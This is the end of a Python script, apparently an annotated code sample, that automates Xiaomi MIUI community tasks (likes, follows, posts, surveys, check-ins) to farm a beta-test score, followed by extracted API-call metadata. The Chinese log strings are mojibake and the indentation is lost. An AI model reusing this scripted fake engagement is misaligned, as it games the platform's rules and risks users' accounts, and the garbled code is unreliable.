        ๅฆ๏ผQmsgๅ้ๅฐQQ ๆ่ๅ้้ฎไปถๆ้
        :return: ๅฝๅ็ๅๆตๅๅผ
"""
headers = {
'cookie': str(self.cookie)
}
try:
response = requests.get('https://api.vip.miui.com/mtop/planet/vip/betaTest/score', headers=headers)
r_json = response.json()
your_score = r_json['entity']
            w_log('ๆๅ่ทๅๅๆตๅ,ๅฝๅๅๆตๅ๏ผ' + str(your_score))
return your_score
except Exception as e:
            w_log('ๅๆตๅ่ทๅๅคฑ่ดฅ')
process_exception(e)
def process_exception(e: Exception):
"""
    ๅจๅฑๅผๅธธๅค็
:param e: ๅผๅธธๅฎไพ
:return: No return
"""
if e.__str__() == 'check_hostname requires server_hostname':
w_log('็ณป็ป่ฎพ็ฝฎไบไปฃ็๏ผๅบ็ฐๅผๅธธ')
def start(miui_task: MIUITask, check_in: bool, enhanced_mode: bool):
if miui_task.mi_login():
w_log("ๆฌ่ๆฌๆฏๆ็คพๅบ็ญพๅฐ๏ผๅ ่ฏฅๅ่ฝๅญๅจ้ฃ้ฉ้ป่ฎค็ฆ็จ")
w_log("ๅฆๆจๆฟๆๆฟๆ
ไธๅๅฏ่ฝ็ๅๆ๏ผๅฏ็ผ่พ้
็ฝฎๆไปถๆๅจๆๅผ่ฏฅๅ่ฝ")
if check_in:
w_log("้ฃ้ฉๅ่ฝๆ็คบ๏ผๆญฃๅจ่ฟ่ก็คพๅบ็ญพๅฐ")
miui_task.vip_check_in()
w_log("ๆญฃๅจๅฎๆๆปกๆๅบฆ่ฐๆฅไปปๅก")
miui_task.get_survey_id()
w_log("ๆญฃๅจๅฎๆ็น่ตไปปๅก")
miui_task.start_task("10106256")
miui_task.thumb_up()
time.sleep(0.2)
miui_task.cancel_thumb_up()
time.sleep(0.2)
miui_task.acquire_task("10106256")
w_log("ๆญฃๅจๅฎๆๆดป่ทๅ_ๅ
ณๆณจไปปๅก")
miui_task.start_task("10106261")
miui_task.unfollow_user()
miui_task.follow_user()
w_log("5็งๅ้ขๅๆดป่ทๅ_ๅ
ณๆณจไปปๅก")
time.sleep(5)
miui_task.acquire_task("10106261")
w_log("ๆญฃๅจๅฎๆๆดป่ทๅ_ๅ ๅไปปๅก")
miui_task.start_task("10106262")
miui_task.unfollow_board()
miui_task.follow_board()
w_log("5็งๅ้ขๅๆดป่ทๅ_ๅ ๅไปปๅก")
time.sleep(5)
miui_task.acquire_task("10106262")
if enhanced_mode:
w_log("้ฃ้ฉๅ่ฝๆ็คบ๏ผๅขๅผบๆจกๅผๅทฒๅฏ็จ")
w_log("ๅขๅผบๆจกๅผๅทฒๅฏ็จ๏ผๅญๅจๅฐๅท้ฃ้ฉ")
miui_task.start_task("10106263")
w_log("ๆญฃๅจๅฎๆBUGๅ้ฆไปปๅก")
miui_task.new_announce("7")
w_log("3็งๅๆง่กๆๅปบ่ฎฎไปปๅก")
miui_task.acquire_task("10106263")
time.sleep(3)
w_log("ๆญฃๅจๅฎๆๆๅปบ่ฎฎไปปๅก")
miui_task.new_announce("6")
w_log("ๆญฃๅจๅฎๆๆดป่ทๅ_ๅๅธไปปๅก")
miui_task.start_task("10106265")
miui_task.new_announce("3")
w_log("5็งๅ้ขๅๆดป่ทๅ_ๅๅธไปปๅก")
time.sleep(5)
miui_task.acquire_task("10106265")
miui_task.get_score()
def main():
w_log("MIUI-AUTO-TASK v1.4")
w_log('---------- ็ณป็ปไฟกๆฏ -------------')
system_info()
w_log('---------- ้กน็ฎไฟกๆฏ -------------')
w_log("้กน็ฎๅฐๅ๏ผhttps://github.com/0-8-4/miui-auto-tasks")
w_log("ๆฌข่ฟ star๏ผๆ่ฐขๆฑ้ฒ็ ็ฉถๆไธญ็ๅคงไฝฌ")
    w_log('---------- ้็ฝฎๆฃๆต -------------')
config = get_config()
if not check_config(config):
        w_log('้็ฝฎๆไปถๆฒกๆๆญฃ็กฎ้็ฝฎ')
exit(1)
else:
config = format_config(config)
for i in config.get('accounts'):
w_log('---------- EXECUTING -------------')
start(
MIUITask(i.get('uid'), i.get('password'), i.get('user-agent'), i.get('board-id'), device_id=i.get('device-id')),
i.get('check-in'),
i.get('enhance-mode')
)
s_log(config.get('logging'))
def main_handler(event, context):
main()
if __name__ == "__main__":
main()
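# Sketch of a notification hook built on get_score()'s return value, as the
# get_score docstring suggests. notify_score and notify_url are illustrative
# names added for this example, not part of the original script; any HTTP
# push service (Qmsg, e-mail gateway, etc.) could stand behind the URL.
def notify_score(miui_task: MIUITask, notify_url: str):
    score = miui_task.get_score()
    if score is not None:
        # push the current score to a user-supplied endpoint
        requests.get(notify_url, params={'text': 'MIUI beta score: %s' % score})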
|
[
"utils.utils.check_config",
"json.loads",
"http.cookiejar.CookieJar",
"urllib.request.HTTPCookieProcessor",
"utils.utils.system_info",
"time.sleep",
"urllib.request.build_opener",
"utils.utils.format_config",
"time.time",
"requests.get",
"requests.post",
"utils.utils.get_config",
"utils.utils.w_log"
] |
[((19016, 19044), 'utils.utils.w_log', 'w_log', (['"""MIUI-AUTO-TASK v1.4"""'], {}), "('MIUI-AUTO-TASK v1.4')\n", (19021, 19044), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((19049, 19087), 'utils.utils.w_log', 'w_log', (['"""---------- ็ณป็ปไฟกๆฏ -------------"""'], {}), "('---------- ็ณป็ปไฟกๆฏ -------------')\n", (19054, 19087), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((19092, 19105), 'utils.utils.system_info', 'system_info', ([], {}), '()\n', (19103, 19105), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((19110, 19148), 'utils.utils.w_log', 'w_log', (['"""---------- ้กน็ฎไฟกๆฏ -------------"""'], {}), "('---------- ้กน็ฎไฟกๆฏ -------------')\n", (19115, 19148), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((19153, 19207), 'utils.utils.w_log', 'w_log', (['"""้กน็ฎๅฐๅ๏ผhttps://github.com/0-8-4/miui-auto-tasks"""'], {}), "('้กน็ฎๅฐๅ๏ผhttps://github.com/0-8-4/miui-auto-tasks')\n", (19158, 19207), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((19212, 19240), 'utils.utils.w_log', 'w_log', (['"""ๆฌข่ฟ star๏ผๆ่ฐขๆฑ้ฒ็ ็ฉถๆไธญ็ๅคงไฝฌ"""'], {}), "('ๆฌข่ฟ star๏ผๆ่ฐขๆฑ้ฒ็ ็ฉถๆไธญ็ๅคงไฝฌ')\n", (19217, 19240), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((19245, 19283), 'utils.utils.w_log', 'w_log', (['"""---------- ้็ฝฎๆฃๆต -------------"""'], {}), "('---------- ้็ฝฎๆฃๆต -------------')\n", (19250, 19283), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((19302, 19314), 'utils.utils.get_config', 'get_config', ([], {}), '()\n', (19312, 19314), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((17291, 17312), 'utils.utils.w_log', 'w_log', (['"""็ณป็ป่ฎพ็ฝฎไบไปฃ็๏ผๅบ็ฐๅผๅธธ"""'], {}), "('็ณป็ป่ฎพ็ฝฎไบไปฃ็๏ผๅบ็ฐๅผๅธธ')\n", (17296, 17312), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((17422, 17453), 'utils.utils.w_log', 'w_log', (['"""ๆฌ่ๆฌๆฏๆ็คพๅบ็ญพๅฐ๏ผๅ ่ฏฅๅ่ฝๅญๅจ้ฃ้ฉ้ป่ฎค็ฆ็จ"""'], {}), "('ๆฌ่ๆฌๆฏๆ็คพๅบ็ญพๅฐ๏ผๅ ่ฏฅๅ่ฝๅญๅจ้ฃ้ฉ้ป่ฎค็ฆ็จ')\n", (17427, 17453), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((17462, 17499), 'utils.utils.w_log', 'w_log', (['"""ๅฆๆจๆฟๆๆฟๆไธๅๅฏ่ฝ็ๅๆ๏ผๅฏ็ผ่พ้็ฝฎๆไปถๆๅจๆๅผ่ฏฅๅ่ฝ"""'], {}), "('ๅฆๆจๆฟๆๆฟๆไธๅๅฏ่ฝ็ๅๆ๏ผๅฏ็ผ่พ้็ฝฎๆไปถๆๅจๆๅผ่ฏฅๅ่ฝ')\n", (17467, 17499), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((17603, 17623), 'utils.utils.w_log', 'w_log', (['"""ๆญฃๅจๅฎๆๆปกๆๅบฆ่ฐๆฅไปปๅก"""'], {}), "('ๆญฃๅจๅฎๆๆปกๆๅบฆ่ฐๆฅไปปๅก')\n", (17608, 17623), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((17666, 17683), 'utils.utils.w_log', 'w_log', (['"""ๆญฃๅจๅฎๆ็น่ตไปปๅก"""'], {}), "('ๆญฃๅจๅฎๆ็น่ตไปปๅก')\n", (17671, 17683), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((17762, 17777), 'time.sleep', 'time.sleep', (['(0.2)'], {}), '(0.2)\n', (17772, 17777), False, 'import time\n'), ((17822, 17837), 'time.sleep', 'time.sleep', (['(0.2)'], {}), '(0.2)\n', (17832, 17837), False, 'import time\n'), ((17889, 17910), 'utils.utils.w_log', 'w_log', (['"""ๆญฃๅจๅฎๆๆดป่ทๅ_ๅณๆณจไปปๅก"""'], {}), "('ๆญฃๅจๅฎๆๆดป่ทๅ_ๅณๆณจไปปๅก')\n", (17894, 17910), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((18026, 18048), 'utils.utils.w_log', 'w_log', (['"""5็งๅ้ขๅๆดป่ทๅ_ๅณๆณจไปปๅก"""'], {}), "('5็งๅ้ขๅๆดป่ทๅ_ๅณๆณจไปปๅก')\n", (18031, 18048), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((18057, 18070), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (18067, 18070), False, 'import time\n'), ((18122, 18143), 'utils.utils.w_log', 'w_log', (['"""ๆญฃๅจๅฎๆๆดป่ทๅ_ๅ ๅไปปๅก"""'], {}), "('ๆญฃๅจๅฎๆๆดป่ทๅ_ๅ ๅไปปๅก')\n", (18127, 18143), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((18261, 18283), 'utils.utils.w_log', 'w_log', (['"""5็งๅ้ขๅๆดป่ทๅ_ๅ ๅไปปๅก"""'], {}), "('5็งๅ้ขๅๆดป่ทๅ_ๅ ๅไปปๅก')\n", (18266, 18283), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((18292, 18305), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (18302, 18305), False, 'import time\n'), ((19327, 19347), 'utils.utils.check_config', 'check_config', (['config'], {}), '(config)\n', (19339, 19347), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((19357, 19376), 'utils.utils.w_log', 'w_log', (['"""้็ฝฎๆไปถๆฒกๆๆญฃ็กฎ้็ฝฎ"""'], {}), "('้็ฝฎๆไปถๆฒกๆๆญฃ็กฎ้็ฝฎ')\n", (19362, 19376), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((19420, 19441), 'utils.utils.format_config', 'format_config', (['config'], {}), '(config)\n', (19433, 19441), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((19488, 19531), 'utils.utils.w_log', 'w_log', (['"""---------- EXECUTING -------------"""'], {}), "('---------- EXECUTING -------------')\n", (19493, 19531), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((687, 796), 'requests.get', 'requests.get', (['"""https://api.vip.miui.com/api/community/post/thumbUp?postId=28270729"""'], {'headers': 'headers'}), "(\n 'https://api.vip.miui.com/api/community/post/thumbUp?postId=28270729',\n headers=headers)\n", (699, 796), False, 'import requests\n'), ((1060, 1073), 'utils.utils.w_log', 'w_log', (['"""็น่ตๆๅ"""'], {}), "('็น่ตๆๅ')\n", (1065, 1073), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((1289, 1405), 'requests.get', 'requests.get', (['"""https://api.vip.miui.com/api/community/post/cancelThumbUp?postId=28270729"""'], {'headers': 'headers'}), "(\n 'https://api.vip.miui.com/api/community/post/cancelThumbUp?postId=28270729'\n , headers=headers)\n", (1301, 1405), False, 'import requests\n'), ((1672, 1687), 'utils.utils.w_log', 'w_log', (['"""ๅๆถ็น่ตๆๅ"""'], {}), "('ๅๆถ็น่ตๆๅ')\n", (1677, 1687), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((3547, 3655), 'requests.post', 'requests.post', (['"""https://api.vip.miui.com/api/community/post/add/newAnnounce"""'], {'headers': 'headers', 'data': 'data'}), "('https://api.vip.miui.com/api/community/post/add/newAnnounce',\n headers=headers, data=data)\n", (3560, 3655), False, 'import requests\n'), ((3943, 3971), 'json.loads', 'json.loads', (["r_json['entity']"], {}), "(r_json['entity'])\n", (3953, 3971), False, 'import json\n'), ((4145, 4158), 'time.sleep', 'time.sleep', (['(3)'], {}), '(3)\n', (4155, 4158), False, 'import time\n'), ((4956, 5087), 'requests.post', 'requests.post', (['"""https://api.vip.miui.com/mtop/planet/vip/content/addCommentReturnCommentInfo"""'], {'headers': 'headers', 'data': 'data'}), "(\n 'https://api.vip.miui.com/mtop/planet/vip/content/addCommentReturnCommentInfo'\n , headers=headers, data=data)\n", (4969, 5087), False, 'import requests\n'), ((5351, 5364), 'utils.utils.w_log', 'w_log', (['"""ๅๅคๆๅ"""'], {}), "('ๅๅคๆๅ')\n", (5356, 5364), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((5516, 5537), 'http.cookiejar.CookieJar', 'cookiejar.CookieJar', ([], {}), '()\n', (5535, 5537), False, 'from http import cookiejar\n'), ((5560, 5597), 'urllib.request.HTTPCookieProcessor', 'request.HTTPCookieProcessor', (['r_cookie'], {}), '(r_cookie)\n', (5587, 5597), False, 'from urllib import request\n'), ((5619, 5648), 'urllib.request.build_opener', 'request.build_opener', (['handler'], {}), '(handler)\n', (5639, 5648), False, 'from urllib import request\n'), ((6518, 6618), 'requests.post', 'requests.post', (['"""https://api.vip.miui.com/api/miui/dev/survey/submit"""'], {'headers': 'headers', 'data': 'data'}), "('https://api.vip.miui.com/api/miui/dev/survey/submit', headers=headers, data=data)\n", (6531, 6618), False, 'import requests\n'), ((6857, 6873), 'utils.utils.w_log', 'w_log', (['"""ๆปกๆๅบฆๆ็ฅจๆๅ"""'], {}), "('ๆปกๆๅบฆๆ็ฅจๆๅ')\n", (6862, 6873), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((7104, 7198), 'requests.get', 'requests.get', (['"""https://api.vip.miui.com/api/miui/dev/survey?businessId=2"""'], {'headers': 'headers'}), "('https://api.vip.miui.com/api/miui/dev/survey?businessId=2',\n headers=headers)\n", (7116, 7198), False, 'import requests\n'), ((7930, 8055), 'requests.get', 'requests.get', (['"""https://api.vip.miui.com/api/community/user/relation/unfollow?followeeId=210836962"""'], {'headers': 'headers'}), "(\n 'https://api.vip.miui.com/api/community/user/relation/unfollow?followeeId=210836962'\n , headers=headers)\n", (7942, 8055), False, 'import requests\n'), ((8322, 8337), 'utils.utils.w_log', 'w_log', (['"""ๅๅณ็จๆทๆๅ"""'], {}), "('ๅๅณ็จๆทๆๅ')\n", (8327, 8337), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((8562, 8685), 'requests.get', 'requests.get', (['"""https://api.vip.miui.com/api/community/user/relation/follow?followeeId=210836962"""'], {'headers': 'headers'}), "(\n 'https://api.vip.miui.com/api/community/user/relation/follow?followeeId=210836962'\n , headers=headers)\n", (8574, 8685), False, 'import requests\n'), ((8948, 8963), 'utils.utils.w_log', 'w_log', (['"""ๅณๆณจ็จๆทๆๅ"""'], {}), "('ๅณๆณจ็จๆทๆๅ')\n", (8953, 8963), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((9191, 9302), 'requests.get', 'requests.get', (['"""https://api.vip.miui.com/api/community/board/unfollow?boardId=5462662"""'], {'headers': 'headers'}), "(\n 'https://api.vip.miui.com/api/community/board/unfollow?boardId=5462662',\n headers=headers)\n", (9203, 9302), False, 'import requests\n'), ((9570, 9585), 'utils.utils.w_log', 'w_log', (['"""้ๅบๅๅญๆๅ"""'], {}), "('้ๅบๅๅญๆๅ')\n", (9575, 9585), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((9811, 9920), 'requests.get', 'requests.get', (['"""https://api.vip.miui.com/api/community/board/follow?boardId=5462662"""'], {'headers': 'headers'}), "(\n 'https://api.vip.miui.com/api/community/board/follow?boardId=5462662',\n headers=headers)\n", (9823, 9920), False, 'import requests\n'), ((10152, 10167), 'utils.utils.w_log', 'w_log', (['"""ๅ ๅฅๅๅญๆๅ"""'], {}), "('ๅ ๅฅๅๅญๆๅ')\n", (10157, 10167), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((10494, 10622), 'requests.post', 'requests.post', (['"""https://api.vip.miui.com/api/community/user/task/start?version=dev.210805"""'], {'headers': 'headers', 'data': 'data'}), "(\n 'https://api.vip.miui.com/api/community/user/task/start?version=dev.210805'\n , headers=headers, data=data)\n", (10507, 10622), False, 'import requests\n'), ((10896, 10914), 'utils.utils.w_log', 'w_log', (['"""ๅผๅงๆดป่ทๅไปปๅกๆๅ"""'], {}), "('ๅผๅงๆดป่ทๅไปปๅกๆๅ')\n", (10901, 10914), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((11267, 11397), 'requests.post', 'requests.post', (['"""https://api.vip.miui.com/api/community/user/task/acquire?version=dev.210805"""'], {'headers': 'headers', 'data': 'data'}), "(\n 'https://api.vip.miui.com/api/community/user/task/acquire?version=dev.210805'\n , headers=headers, data=data)\n", (11280, 11397), False, 'import requests\n'), ((11667, 11683), 'utils.utils.w_log', 'w_log', (['"""้ขๅๆดป่ทๅๆๅ"""'], {}), "('้ขๅๆดป่ทๅๆๅ')\n", (11672, 11683), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((12068, 12157), 'requests.post', 'requests.post', (['"""https://api.vip.miui.com/api/carrot/pull"""'], {'headers': 'headers', 'data': 'data'}), "('https://api.vip.miui.com/api/carrot/pull', headers=headers,\n data=data)\n", (12081, 12157), False, 'import requests\n'), ((12437, 12455), 'utils.utils.w_log', 'w_log', (['"""็คพๅบๆ่ๅ็ญพๅฐๆๅ"""'], {}), "('็คพๅบๆ่ๅ็ญพๅฐๆๅ')\n", (12442, 12455), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((15572, 15688), 'requests.post', 'requests.post', (['"""https://account.xiaomi.com/pass/serviceLoginAuth2"""'], {'headers': 'headers', 'data': 'data', 'proxies': 'proxies'}), "('https://account.xiaomi.com/pass/serviceLoginAuth2', headers=\n headers, data=data, proxies=proxies)\n", (15585, 15688), False, 'import requests\n'), ((15824, 15849), 'json.loads', 'json.loads', (['response_data'], {}), '(response_data)\n', (15834, 15849), False, 'import json\n'), ((16344, 16359), 'utils.utils.w_log', 'w_log', (['"""่ดฆๅท็ปๅฝๅฎๆ"""'], {}), "('่ดฆๅท็ปๅฝๅฎๆ')\n", (16349, 16359), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((16765, 16857), 'requests.get', 'requests.get', (['"""https://api.vip.miui.com/mtop/planet/vip/betaTest/score"""'], {'headers': 'headers'}), "('https://api.vip.miui.com/mtop/planet/vip/betaTest/score',\n headers=headers)\n", (16777, 16857), False, 'import requests\n'), ((17533, 17557), 'utils.utils.w_log', 'w_log', (['"""้ฃ้ฉๅ่ฝๆ็คบ๏ผๆญฃๅจ่ฟ่ก็คพๅบ็ญพๅฐ"""'], {}), "('้ฃ้ฉๅ่ฝๆ็คบ๏ผๆญฃๅจ่ฟ่ก็คพๅบ็ญพๅฐ')\n", (17538, 17557), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((18387, 18410), 'utils.utils.w_log', 'w_log', (['"""้ฃ้ฉๅ่ฝๆ็คบ๏ผๅขๅผบๆจกๅผๅทฒๅฏ็จ"""'], {}), "('้ฃ้ฉๅ่ฝๆ็คบ๏ผๅขๅผบๆจกๅผๅทฒๅฏ็จ')\n", (18392, 18410), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((18423, 18446), 'utils.utils.w_log', 'w_log', (['"""ๅขๅผบๆจกๅผๅทฒๅฏ็จ๏ผๅญๅจๅฐๅท้ฃ้ฉ"""'], {}), "('ๅขๅผบๆจกๅผๅทฒๅฏ็จ๏ผๅญๅจๅฐๅท้ฃ้ฉ')\n", (18428, 18446), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((18504, 18524), 'utils.utils.w_log', 'w_log', (['"""ๆญฃๅจๅฎๆBUGๅ้ฆไปปๅก"""'], {}), "('ๆญฃๅจๅฎๆBUGๅ้ฆไปปๅก')\n", (18509, 18524), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((18577, 18596), 'utils.utils.w_log', 'w_log', (['"""3็งๅๆง่กๆๅปบ่ฎฎไปปๅก"""'], {}), "('3็งๅๆง่กๆๅปบ่ฎฎไปปๅก')\n", (18582, 18596), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((18656, 18669), 'time.sleep', 'time.sleep', (['(3)'], {}), '(3)\n', (18666, 18669), False, 'import time\n'), ((18682, 18700), 'utils.utils.w_log', 'w_log', (['"""ๆญฃๅจๅฎๆๆๅปบ่ฎฎไปปๅก"""'], {}), "('ๆญฃๅจๅฎๆๆๅปบ่ฎฎไปปๅก')\n", (18687, 18700), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((18753, 18774), 'utils.utils.w_log', 'w_log', (['"""ๆญฃๅจๅฎๆๆดป่ทๅ_ๅๅธไปปๅก"""'], {}), "('ๆญฃๅจๅฎๆๆดป่ทๅ_ๅๅธไปปๅก')\n", (18758, 18774), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((18872, 18894), 'utils.utils.w_log', 'w_log', (['"""5็งๅ้ขๅๆดป่ทๅ_ๅๅธไปปๅก"""'], {}), "('5็งๅ้ขๅๆดป่ทๅ_ๅๅธไปปๅก')\n", (18877, 18894), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((18907, 18920), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (18917, 18920), False, 'import time\n'), ((922, 944), 'utils.utils.w_log', 'w_log', (['"""็น่ตๅคฑ่ดฅ๏ผCookieๆ ๆ"""'], {}), "('็น่ตๅคฑ่ดฅ๏ผCookieๆ ๆ')\n", (927, 944), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((1117, 1130), 'utils.utils.w_log', 'w_log', (['"""็น่ตๅบ้"""'], {}), "('็น่ตๅบ้')\n", (1122, 1130), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((1143, 1151), 'utils.utils.w_log', 'w_log', (['e'], {}), '(e)\n', (1148, 1151), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((1530, 1554), 'utils.utils.w_log', 'w_log', (['"""ๅๆถ็น่ตๅคฑ่ดฅ๏ผCookieๆ ๆ"""'], {}), "('ๅๆถ็น่ตๅคฑ่ดฅ๏ผCookieๆ ๆ')\n", (1535, 1554), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((1731, 1746), 'utils.utils.w_log', 'w_log', (['"""ๅๆถ็น่ตๅบ้"""'], {}), "('ๅๆถ็น่ตๅบ้')\n", (1736, 1746), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((1759, 1767), 'utils.utils.w_log', 'w_log', (['e'], {}), '(e)\n', (1764, 1767), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((2150, 2174), 'utils.utils.w_log', 'w_log', (['"""ๅ ้คๅๅฎนๅคฑ่ดฅ๏ผCookieๆ ๆ"""'], {}), "('ๅ ้คๅๅฎนๅคฑ่ดฅ๏ผCookieๆ ๆ')\n", (2155, 2174), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((2377, 2398), 'utils.utils.w_log', 'w_log', (['"""ๅ ้คๅๅฎนๅบ้๏ผ่ฏทๆๅจๅ ้ค"""'], {}), "('ๅ ้คๅๅฎนๅบ้๏ผ่ฏทๆๅจๅ ้ค')\n", (2382, 2398), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((2411, 2419), 'utils.utils.w_log', 'w_log', (['e'], {}), '(e)\n', (2416, 2419), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((3787, 3811), 'utils.utils.w_log', 'w_log', (['"""ๅ่กจๅๅฎนๅคฑ่ดฅ๏ผCookieๆ ๆ"""'], {}), "('ๅ่กจๅๅฎนๅคฑ่ดฅ๏ผCookieๆ ๆ')\n", (3792, 3811), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((4329, 4344), 'utils.utils.w_log', 'w_log', (['"""ๅ่กจๅๅฎนๅบ้"""'], {}), "('ๅ่กจๅๅฎนๅบ้')\n", (4334, 4365), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((4357, 4365), 'utils.utils.w_log', 'w_log', (['e'], {}), '(e)\n', (4362, 4365), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((5213, 5235), 'utils.utils.w_log', 'w_log', (['"""ๅๅคๅคฑ่ดฅ๏ผCookieๆ ๆ"""'], {}), "('ๅๅคๅคฑ่ดฅ๏ผCookieๆ ๆ')\n", (5218, 5235), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((5408, 5421), 'utils.utils.w_log', 'w_log', (['"""ๅๅคๅบ้"""'], {}), "('ๅๅคๅบ้')\n", (5413, 5421), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((5434, 5442), 'utils.utils.w_log', 'w_log', (['e'], {}), '(e)\n', (5439, 5442), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((6149, 6157), 'utils.utils.w_log', 'w_log', (['e'], {}), '(e)\n', (6154, 6157), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((6713, 6738), 'utils.utils.w_log', 'w_log', (['"""ๆปกๆๅบฆๆ็ฅจๅคฑ่ดฅ๏ผCookieๆ ๆ"""'], {}), "('ๆปกๆๅบฆๆ็ฅจๅคฑ่ดฅ๏ผCookieๆ ๆ')\n", (6718, 6738), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((6917, 6933), 'utils.utils.w_log', 'w_log', (['"""ๆปกๆๅบฆๆ็ฅจๅบ้"""'], {}), "('ๆปกๆๅบฆๆ็ฅจๅบ้')\n", (6922, 6933), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((6946, 6954), 'utils.utils.w_log', 'w_log', (['e'], {}), '(e)\n', (6951, 6954), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((7293, 7319), 'utils.utils.w_log', 'w_log', (['"""่ทๅ้ฎๅทIDๅคฑ่ดฅ๏ผCookieๆ ๆ"""'], {}), "('่ทๅ้ฎๅทIDๅคฑ่ดฅ๏ผCookieๆ ๆ')\n", (7298, 7319), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((7737, 7762), 'utils.utils.w_log', 'w_log', (['"""่ทๅ้ฎๅทIDๅบ้๏ผๆปกๆๅบฆๆ็ฅจๅคฑ่ดฅ"""'], {}), "('่ทๅ้ฎๅทIDๅบ้๏ผๆปกๆๅบฆๆ็ฅจๅคฑ่ดฅ')\n", (7742, 7762), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((7775, 7783), 'utils.utils.w_log', 'w_log', (['e'], {}), '(e)\n', (7780, 7783), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((8180, 8204), 'utils.utils.w_log', 'w_log', (['"""ๅๅณ็จๆทๅคฑ่ดฅ๏ผCookieๆ ๆ"""'], {}), "('ๅๅณ็จๆทๅคฑ่ดฅ๏ผCookieๆ ๆ')\n", (8185, 8204), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((8381, 8396), 'utils.utils.w_log', 'w_log', (['"""ๅๅณ็จๆทๅบ้"""'], {}), "('ๅๅณ็จๆทๅบ้')\n", (8386, 8396), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((8409, 8417), 'utils.utils.w_log', 'w_log', (['e'], {}), '(e)\n', (8414, 8417), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config\n'), ((8808, 8832), 'utils.utils.w_log', 'w_log', (['"""ๅณๆณจ็จๆทๅคฑ่ดฅ๏ผCookieๆ ๆ"""'], {}), "('ๅณๆณจ็จๆทๅคฑ่ดฅ๏ผCookieๆ ๆ')\n", (8813, 8832), False, 'from utils.utils import system_info, get_config, w_log, s_log, check_config, 